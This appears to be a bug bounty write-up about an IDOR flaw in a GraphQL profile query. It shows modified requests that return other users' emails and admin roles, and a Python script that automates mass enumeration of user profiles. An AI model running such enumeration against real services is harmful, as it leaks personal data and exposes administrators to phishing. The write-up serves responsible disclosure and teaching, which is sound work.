.png)
19 hours ago
6 BOOK THIS SPACE FOR AD
ARTICLE AD
GraphQL security misconfigurations can lead to massive data leaks if not properly secured. Recently, while testing a web application, I discovered a critical Insecure Direct Object Reference (IDOR) vulnerability in its GraphQL API that allowed unauthenticated attackers to extract admin emails, roles, and other sensitive information — all without logging in! 🚨
As part of my bug bounty & security research process, I first created an account on the targeted website. After logging in, I began exploring the site’s functionality, looking for potential misconfigurations or security flaws.
One of the first things I examined was the account settings page, where users could view and update their profile information. This led me to intercept GraphQL requests made to the server — and that’s where things got interesting.
While navigating through my account settings, I noticed a GraphQL request that was fetching my own profile data. The request looked like this:
- Legitimate Request (Fetching My Own Profile)
{"operationName": "GetProfileInfo",
"variables": {
"username": "my-username"
},
"query": "query GetProfileInfo($username: String!) { user(username: $username) { id username email role createdAt } }"
}
✅ Expected Response (Only My Own Data)
{"data": {
"user": {
"id": 12345,
"username": "my-username",
"email": "myemail@example.com",
"role": "member",
"createdAt": "1629136002"
}
}
}
So far, everything looked normal — the API was returning only my own account data.
Curious about whether the API enforced proper access control, I modified the "username" parameter to another username (which I had found earlier through user enumeration) and for simplicity, Let’s call it victim.
- Modified Request (Targeting The Vicitim)
{"operationName": "GetProfileInfo",
"variables": {
"username": "victim"
},
"query": "query GetProfileInfo($username: String!) { user(username: $username) { id username email role createdAt } }"
}
🚨 Unexpected Response (Victim Profile Disclosure)
{"data": {
"user": {
"id": 5,
"username": "victim",
"email": "victim@victim.com",
"role": "admin",
"createdAt": "1629136002"
}
}
}
🔥 This proved that the API was leaking private admin information!
No authentication required → Any attacker could request admin details.Full user enumeration possible → Attackers could scrape all registered users.Admin accounts exposed → Attackers could phish admins or attempt brute-force attacks.🚨 This vulnerability was reported to the security team through HackerOne and was triaged as HIGH 7.5 severity!
Since usernames were predictable, I wrote a Python script to automate the enumeration of all users and extract emails, roles, and profile details.
- Python Script for Automated User Extraction
import requests# Target GraphQL endpoint (replace with actual URL)
url = "https://example.com/graphql"
headers = {"Content-Type": "application/json"}
# List of usernames to test (brute-forced, guessed, or obtained via enumeration)
usernames = ["admin", "test-user", "victim1", "victim2"]
for username in usernames:
query = {
"operationName": "GetProfileInfo",
"variables": {"username": username},
"query": "query GetProfileInfo($username: String!) { user(username: $username) { id username email role createdAt } }"
}
response = requests.post(url, json=query, headers=headers)
if response.status_code == 200:
print(f"Extracted: {response.json()}")
print("Enumeration Complete.")
Bengali (Bangladesh) · 
English (United States) ·